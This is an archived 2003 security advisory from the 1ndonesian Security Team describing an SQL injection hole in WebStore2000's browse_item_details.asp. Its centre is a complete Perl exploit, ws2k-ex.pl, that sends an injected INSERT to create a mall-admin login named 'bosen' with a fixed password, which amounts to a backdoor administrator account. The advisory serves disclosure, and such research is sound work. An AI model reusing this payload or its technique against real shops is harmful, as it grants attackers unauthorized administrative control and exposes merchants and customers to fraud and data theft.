Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: bt321.txt

WebStore2000 SQL Injection Vulnerability & Exploit





1ndonesian Security Team (1st)
http://bosen.net/releases/
=======================================================================
=======================
Security Advisory



Advisory Name: WebStore SQL Injection Vulnerability & Exploit
 Release Date: 05/10/2003
  Application: WebStore2000 Version 6.0/ for ISP 
     Platform: Win32
     Severity: High/Remote 
     BUG Type: SQL Injection
       Author: Bosen <mobile@bosen.net>
  Discover by: Bosen <mobile@bosen.net>
Vendor Status: Notified, see response below.
   Vendor URL: http://www.webcortex.com/
    Reference: http://bosen.net/releases/



Overview:
Webstores 2000 is a web based application. 
To run it, you will need a computer running a web server and connected 
to the internet.
You can either run it yourself or host it with an ISP.



Details:
Even the code encrypted, and the error couse by SQL injection handled 
very good.
But however the SQL injection still works fine with this application.
The hole is on browse_item_details.asp. 



Exploits:
ws2k-ex.pl
_START_
#!/usr/bin/perl -w
#This exploit create user with Mall Admin priv. 
#You can login via /MallAdmin/
$pamer = "
1ndonesian Security Team (1st)
==============================
http://bosen.net/releases/

ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
Exploit by  : Bosen
Discover by : Bosen
Greetz to   : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka 
              all #hackers\@centrin.net.id/austnet.org"; 

use LWP::UserAgent;  
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl ws2k-ex.pl <uri>\n\n";
  exit;
}
my $legend  = "$ARGV[0]/browse_item_details.asp?Item_ID=";
$legend    .= "''; insert into Mall_Logins values ('bosen','gembel')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $legend);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) { printf " %s\n", $dodol->status_line;
} else { print "Alhamdulillah :P\n"; }
print "\n680165\n";
_EOF_



Vendor Response:
The vendor provided BUG Forum, we post the bug but not in details with 
hope some
of the developer response. But until now, theres no response.



Recommendation:
The application is new release. And the old version also vulnerability.
So theres no recommendation until now.



1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/



About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced 
application
security assessment. Based in Indonesia, 1ndonesian Security Team 
offers best of
breed security consulting services, specialising in application, host 
and network
security assessments.

1st provides security information and patches for use by the entire 1st 
community.

This information is provided freely to all interested parties and may 
be 
redistributed provided that it is not altered in any way, 1st is 
appropriately 
credited and the document retains.


Greetz to: 
AresU, TioEuy, sakitjiwa, syzwz, 
and all 1ndonesian Security Team




Bosen <mobile@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=30


-----------------------------------------------
This mail sent through http://webmail.bosen.net


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH